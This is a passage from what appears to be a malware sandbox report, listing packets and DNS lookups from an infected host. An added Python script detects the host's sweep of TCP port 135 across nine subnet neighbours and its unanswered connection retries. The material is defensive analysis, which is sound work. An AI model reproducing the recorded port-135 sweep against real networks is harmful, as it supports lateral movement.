Feb 12, 2018 21:38:33.718898058 CET | 53 | 57291 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:34.032504082 CET | 64225 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:34.168128967 CET | 53 | 64225 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:34.497317076 CET | 64017 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:34.668488026 CET | 53 | 64017 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:34.980822086 CET | 61578 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:35.109461069 CET | 53 | 61578 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:35.419275999 CET | 64808 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:35.682538033 CET | 53 | 64808 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:35.696975946 CET | 49169 | 135 | 192.168.2.2 | 192.168.2.254
Feb 12, 2018 21:38:35.823093891 CET | 49170 | 135 | 192.168.2.2 | 192.168.2.246
Feb 12, 2018 21:38:35.824702978 CET | 49171 | 135 | 192.168.2.2 | 192.168.2.252
Feb 12, 2018 21:38:35.826517105 CET | 49172 | 135 | 192.168.2.2 | 192.168.2.248
Feb 12, 2018 21:38:35.827938080 CET | 49173 | 135 | 192.168.2.2 | 192.168.2.250
Feb 12, 2018 21:38:35.835345030 CET | 49174 | 135 | 192.168.2.2 | 192.168.2.244
Feb 12, 2018 21:38:35.895308971 CET | 49175 | 135 | 192.168.2.2 | 192.168.2.240
Feb 12, 2018 21:38:35.896699905 CET | 49176 | 135 | 192.168.2.2 | 192.168.2.238
Feb 12, 2018 21:38:35.903877974 CET | 49177 | 135 | 192.168.2.2 | 192.168.2.242
Feb 12, 2018 21:38:36.022747993 CET | 63535 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:36.172410011 CET | 53 | 63535 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:36.489626884 CET | 64117 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:36.696399927 CET | 53 | 64117 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:37.006269932 CET | 55120 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:37.137315989 CET | 53 | 55120 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:37.452662945 CET | 58962 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:37.739259005 CET | 53 | 58962 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:38.052788973 CET | 50225 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:38.164005041 CET | 53 | 50225 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:38.479089022 CET | 60278 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:38.696377039 CET | 49169 | 135 | 192.168.2.2 | 192.168.2.254
Feb 12, 2018 21:38:38.718569040 CET | 53 | 60278 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:38.880198002 CET | 49170 | 135 | 192.168.2.2 | 192.168.2.246
Feb 12, 2018 21:38:38.880208969 CET | 49171 | 135 | 192.168.2.2 | 192.168.2.252
Feb 12, 2018 21:38:38.880218029 CET | 49172 | 135 | 192.168.2.2 | 192.168.2.248
Feb 12, 2018 21:38:38.880224943 CET | 49173 | 135 | 192.168.2.2 | 192.168.2.250
Feb 12, 2018 21:38:38.880234003 CET | 49174 | 135 | 192.168.2.2 | 192.168.2.244
Feb 12, 2018 21:38:38.916991949 CET | 49175 | 135 | 192.168.2.2 | 192.168.2.240
Feb 12, 2018 21:38:38.917016983 CET | 49176 | 135 | 192.168.2.2 | 192.168.2.238
Feb 12, 2018 21:38:38.917036057 CET | 49177 | 135 | 192.168.2.2 | 192.168.2.242
Feb 12, 2018 21:38:39.026475906 CET | 55216 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:39.156883001 CET | 53 | 55216 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:39.511333942 CET | 56951 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:39.673909903 CET | 53 | 56951 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:39.979579926 CET | 62051 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:40.080379009 CET | 53 | 62051 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:40.392570972 CET | 61043 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:40.572628021 CET | 53 | 61043 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:40.883240938 CET | 64395 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:41.035156965 CET | 53 | 64395 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:41.355576038 CET | 57416 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:41.578322887 CET | 53 | 57416 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:41.888006926 CET | 55268 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:42.034862995 CET | 53 | 55268 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:42.338536024 CET | 65065 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:42.437918901 CET | 53 | 65065 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:42.756555080 CET | 53409 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:42.868976116 CET | 53 | 53409 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:43.488595009 CET | 61881 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:43.676775932 CET | 53 | 61881 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:44.000485897 CET | 53988 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:44.106827974 CET | 53 | 53988 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:44.427696943 CET | 55654 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:44.625426054 CET | 53 | 55654 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:44.714911938 CET | 49169 | 135 | 192.168.2.2 | 192.168.2.254
Feb 12, 2018 21:38:44.915150881 CET | 49170 | 135 | 192.168.2.2 | 192.168.2.246
Feb 12, 2018 21:38:44.915175915 CET | 49171 | 135 | 192.168.2.2 | 192.168.2.252
Feb 12, 2018 21:38:44.915184975 CET | 49172 | 135 | 192.168.2.2 | 192.168.2.248
Feb 12, 2018 21:38:44.915193081 CET | 49173 | 135 | 192.168.2.2 | 192.168.2.250
Feb 12, 2018 21:38:44.915199995 CET | 49174 | 135 | 192.168.2.2 | 192.168.2.244
Feb 12, 2018 21:38:44.915205956 CET | 49175 | 135 | 192.168.2.2 | 192.168.2.240
Feb 12, 2018 21:38:44.915213108 CET | 49176 | 135 | 192.168.2.2 | 192.168.2.238
Feb 12, 2018 21:38:44.915226936 CET | 49177 | 135 | 192.168.2.2 | 192.168.2.242
Feb 12, 2018 21:38:44.953222990 CET | 54534 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:45.142456055 CET | 53 | 54534 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:45.473556995 CET | 51206 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:45.779345989 CET | 53 | 51206 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:46.084404945 CET | 54894 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:46.238379002 CET | 53 | 54894 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:46.544713020 CET | 60111 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:46.779881954 CET | 53 | 60111 | 8.8.8.8 | 192.168.2.2
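
The rows above show 192.168.2.2 opening connections to TCP/135 (the MS-RPC endpoint mapper) on nine neighbouring hosts within about 0.2 s, and each attempt repeating at roughly +3 s and +6 s with no packet ever coming back from a 192.168.2.x address, which is consistent with the back-off of unanswered SYNs; the Behavior Graph credits the 192.168.2.238:135 contact to winlogon.exe. Here is an added example, not part of the sandbox report, that detects such a fan-out and the unanswered retries from rows shaped like this table. ROWS is a constructed subset of the table with '|' between columns (the report runs the columns together); the time window and the host-count and retry thresholds are assumptions.

```python
"""Detect one host fanning out to a single TCP port across many neighbours,
plus the unanswered-retry pattern, from packet rows shaped like the table above.

Added example, not part of the sandbox report. ROWS is a constructed subset of
the TCP Packets table with '|' between columns (the report runs them together);
the time window and the host/retry thresholds are assumptions."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Set, Tuple


class Packet(NamedTuple):
    ts: datetime
    sport: int
    dport: int
    src: str
    dst: str


def parse_row(line: str) -> Packet:
    """Parse 'Feb 12, 2018 21:38:35.696975946 CET | 49169 | 135 | 192.168.2.2 | 192.168.2.254'."""
    stamp, sport, dport, src, dst = [f.strip() for f in line.split("|")]
    base, frac = stamp.replace(" CET", "").rsplit(".", 1)
    ts = datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(microsecond=int(frac[:6]))
    return Packet(ts, int(sport), int(dport), src, dst)


def _ip_key(ip: str) -> Tuple[int, ...]:
    return tuple(int(o) for o in ip.split("."))


def fan_out(packets: List[Packet], dport: int, window: timedelta = timedelta(seconds=60),
            min_hosts: int = 5) -> List[Tuple[str, List[str]]]:
    """Sources that tried `dport` on at least `min_hosts` distinct hosts inside one `window`."""
    by_src: Dict[str, List[Packet]] = defaultdict(list)
    for p in packets:
        if p.dport == dport:
            by_src[p.src].append(p)
    findings = []
    for src, pkts in by_src.items():
        pkts.sort(key=lambda p: p.ts)
        best: Set[str] = set()
        lo = 0
        for hi in range(len(pkts)):            # sliding window over time-ordered attempts
            while pkts[hi].ts - pkts[lo].ts > window:
                lo += 1
            hosts = {p.dst for p in pkts[lo:hi + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            findings.append((src, sorted(best, key=_ip_key)))
    return findings


def unanswered_flows(packets: List[Packet], min_attempts: int = 2) -> Dict[Tuple[str, int, str, int], int]:
    """Flows (src, sport, dst, dport) seen `min_attempts` or more times with no packet
    in the reverse direction: the signature of SYNs that nobody answered."""
    attempts = Counter((p.src, p.sport, p.dst, p.dport) for p in packets)
    return {flow: n for flow, n in attempts.items()
            if n >= min_attempts and (flow[2], flow[3], flow[0], flow[1]) not in attempts}


# Constructed subset of the TCP Packets table: one answered DNS exchange, the nine
# first-attempt port-135 rows, and the retransmits for three of those flows.
ROWS = [
    "Feb 12, 2018 21:38:30.860141993 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8",
    "Feb 12, 2018 21:38:31.765642881 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2",
    "Feb 12, 2018 21:38:35.696975946 CET | 49169 | 135 | 192.168.2.2 | 192.168.2.254",
    "Feb 12, 2018 21:38:35.823093891 CET | 49170 | 135 | 192.168.2.2 | 192.168.2.246",
    "Feb 12, 2018 21:38:35.824702978 CET | 49171 | 135 | 192.168.2.2 | 192.168.2.252",
    "Feb 12, 2018 21:38:35.826517105 CET | 49172 | 135 | 192.168.2.2 | 192.168.2.248",
    "Feb 12, 2018 21:38:35.827938080 CET | 49173 | 135 | 192.168.2.2 | 192.168.2.250",
    "Feb 12, 2018 21:38:35.835345030 CET | 49174 | 135 | 192.168.2.2 | 192.168.2.244",
    "Feb 12, 2018 21:38:35.895308971 CET | 49175 | 135 | 192.168.2.2 | 192.168.2.240",
    "Feb 12, 2018 21:38:35.896699905 CET | 49176 | 135 | 192.168.2.2 | 192.168.2.238",
    "Feb 12, 2018 21:38:35.903877974 CET | 49177 | 135 | 192.168.2.2 | 192.168.2.242",
    "Feb 12, 2018 21:38:38.696377039 CET | 49169 | 135 | 192.168.2.2 | 192.168.2.254",
    "Feb 12, 2018 21:38:38.880198002 CET | 49170 | 135 | 192.168.2.2 | 192.168.2.246",
    "Feb 12, 2018 21:38:38.880208969 CET | 49171 | 135 | 192.168.2.2 | 192.168.2.252",
    "Feb 12, 2018 21:38:44.714911938 CET | 49169 | 135 | 192.168.2.2 | 192.168.2.254",
    "Feb 12, 2018 21:38:44.915150881 CET | 49170 | 135 | 192.168.2.2 | 192.168.2.246",
    "Feb 12, 2018 21:38:44.915175915 CET | 49171 | 135 | 192.168.2.2 | 192.168.2.252",
]

if __name__ == "__main__":
    pkts = [parse_row(r) for r in ROWS]
    for src, hosts in fan_out(pkts, 135):
        print(f"{src} -> TCP/135 on {len(hosts)} hosts: {', '.join(hosts)}")
    for flow, n in sorted(unanswered_flows(pkts).items()):
        print(f"unanswered x{n}: {flow[0]}:{flow[1]} -> {flow[2]}:{flow[3]}")
```

The two checks answer different questions: fan_out says a host is sweeping a port across the subnet, which is the lateral-movement signal regardless of success, while unanswered_flows tells you whether anything actually answered, which in a sandbox with no real neighbours is the expected outcome and on a production network would be the difference between a scan and a foothold.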

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 12, 2018 21:38:30.860141993 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.880199909 CET | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.880276918 CET | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:30.905082941 CET | 51075 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.905164003 CET | 53 | 51075 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:30.927845955 CET | 63053 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.927926064 CET | 53 | 63053 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:30.995573997 CET | 65490 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.995654106 CET | 53 | 65490 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.002337933 CET | 65311 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.002427101 CET | 53 | 65311 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.012367010 CET | 59195 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.012440920 CET | 53 | 59195 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.036601067 CET | 65034 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.036674976 CET | 53 | 65034 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.050959110 CET | 56352 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.051029921 CET | 53 | 56352 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.059361935 CET | 51492 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.059423923 CET | 53 | 51492 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.765642881 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:32.179327011 CET | 65236 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:32.311522007 CET | 53 | 65236 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:32.616265059 CET | 57178 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:32.753743887 CET | 53 | 57178 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:33.061160088 CET | 49408 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:33.179438114 CET | 53 | 49408 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:33.513441086 CET | 57291 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:33.718898058 CET | 53 | 57291 |8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:34.032504082 CET | 64225 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:34.168128967 CET | 53 | 64225 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:34.497317076 CET | 64017 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:34.668488026 CET | 53 | 64017 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:34.980822086 CET | 61578 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:35.109461069 CET | 53 | 61578 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:35.419275999 CET | 64808 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:35.682538033 CET | 53 | 64808 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:36.022747993 CET | 63535 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:36.172410011 CET | 53 | 63535 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:36.489626884 CET | 64117 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:36.696399927 CET | 53 | 64117 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:37.006269932 CET | 55120 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:37.137315989 CET | 53 | 55120 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:37.452662945 CET | 58962 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:37.739259005 CET | 53 | 58962 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:38.052788973 CET | 50225 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:38.164005041 CET | 53 | 50225 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:38.479089022 CET | 60278 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:38.718569040 CET | 53 | 60278 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:39.026475906 CET | 55216 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:39.156883001 CET | 53 | 55216 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:39.511333942 CET | 56951 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:39.673909903 CET | 53 | 56951 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:39.979579926 CET | 62051 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:40.080379009 CET | 53 | 62051 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:40.392570972 CET | 61043 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:40.572628021 CET | 53 | 61043 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:40.883240938 CET | 64395 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:41.035156965 CET | 53 | 64395 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:41.355576038 CET | 57416 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:41.578322887 CET | 53 | 57416 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:41.888006926 CET | 55268 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:42.034862995 CET | 53 | 55268 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:42.338536024 CET | 65065 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:42.437918901 CET | 53 | 65065 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:42.756555080 CET | 53409 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:42.868976116 CET | 53 | 53409 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:43.488595009 CET | 61881 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:43.676775932 CET | 53 | 61881 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:44.000485897 CET | 53988 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:44.106827974 CET | 53 | 53988 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:44.427696943 CET | 55654 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:44.625426054 CET | 53 | 55654 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:44.953222990 CET | 54534 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:45.142456055 CET | 53 | 54534 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:45.473556995 CET | 51206 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:45.779345989 CET | 53 | 51206 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:46.084404945 CET | 54894 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:46.238379002 CET | 53 | 54894 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:46.544713020 CET | 60111 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:46.779881954 CET | 53 | 60111 | 8.8.8.8 | 192.168.2.2

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 12, 2018 21:38:30.860141993 CET | 192.168.2.2 | 8.8.8.8 | 0xb7a7 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:32.179327011 CET | 192.168.2.2 | 8.8.8.8 | 0xc3dd | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:32.616265059 CET | 192.168.2.2 | 8.8.8.8 | 0x152 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:33.061160088 CET | 192.168.2.2 | 8.8.8.8 | 0x26e4 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:33.513441086 CET | 192.168.2.2 | 8.8.8.8 | 0xcd43 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:34.032504082 CET | 192.168.2.2 | 8.8.8.8 | 0xc366 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:34.497317076 CET | 192.168.2.2 | 8.8.8.8 | 0xd809 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:34.980822086 CET | 192.168.2.2 | 8.8.8.8 | 0xfb5 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:35.419275999 CET | 192.168.2.2 | 8.8.8.8 | 0xcd9f | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:36.022747993 CET | 192.168.2.2 | 8.8.8.8 | 0x8b9d | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:36.489626884 CET | 192.168.2.2 | 8.8.8.8 | 0xaa99 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:37.006269932 CET | 192.168.2.2 | 8.8.8.8 | 0x2ad9 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:37.452662945 CET | 192.168.2.2 | 8.8.8.8 | 0x9754 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:38.052788973 CET | 192.168.2.2 | 8.8.8.8 | 0x9aa7 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:38.479089022 CET | 192.168.2.2 | 8.8.8.8 | 0x4024 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:39.026475906 CET | 192.168.2.2 | 8.8.8.8 | 0x7ff | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:39.511333942 CET | 192.168.2.2 | 8.8.8.8 | 0x3298 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:39.979579926 CET | 192.168.2.2 | 8.8.8.8 | 0x2c13 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:40.392570972 CET | 192.168.2.2 | 8.8.8.8 | 0xf3f5 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:40.883240938 CET | 192.168.2.2 | 8.8.8.8 | 0x1fa9 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:41.355576038 CET | 192.168.2.2 | 8.8.8.8 | 0x715f | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:41.888006926 CET | 192.168.2.2 | 8.8.8.8 | 0x948e | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:42.338536024 CET | 192.168.2.2 | 8.8.8.8 | 0x4034 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:42.756555080 CET | 192.168.2.2 | 8.8.8.8 | 0xde3e | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:43.488595009 CET | 192.168.2.2 | 8.8.8.8 | 0xc681 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:44.000485897 CET | 192.168.2.2 | 8.8.8.8 | 0xee4c | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:44.427696943 CET | 192.168.2.2 | 8.8.8.8 | 0xb3fa | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:44.953222990 CET | 192.168.2.2 | 8.8.8.8 | 0x10f7 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:45.473556995 CET | 192.168.2.2 | 8.8.8.8 | 0xfd81 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:46.084404945 CET | 192.168.2.2 | 8.8.8.8 | 0xc169 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:46.544713020 CET | 192.168.2.2 | 8.8.8.8 | 0xad00 | Standard query (0) | 252.0.0.224.in-addr.arpa | PTR (Pointer record) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 12, 2018 21:38:31.765642881 CET | 8.8.8.8 | 192.168.2.2 | 0xb7a7 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:32.311522007 CET | 8.8.8.8 | 192.168.2.2 | 0xc3dd | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:32.753743887 CET | 8.8.8.8 | 192.168.2.2 | 0x152 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:33.179438114 CET | 8.8.8.8 | 192.168.2.2 | 0x26e4 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:33.718898058 CET | 8.8.8.8 | 192.168.2.2 | 0xcd43 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:34.168128967 CET | 8.8.8.8 | 192.168.2.2 | 0xc366 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:34.668488026 CET | 8.8.8.8 | 192.168.2.2 | 0xd809 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:35.109461069 CET | 8.8.8.8 | 192.168.2.2 | 0xfb5 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:35.682538033 CET | 8.8.8.8 | 192.168.2.2 | 0xcd9f | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:36.172410011 CET | 8.8.8.8 | 192.168.2.2 | 0x8b9d | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 12, 2018 21:38:36.696399927 CET | 8.8.8.8 | 192.168.2.2 | 0xaa99 | Name error (3) | 252.0.0.224.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
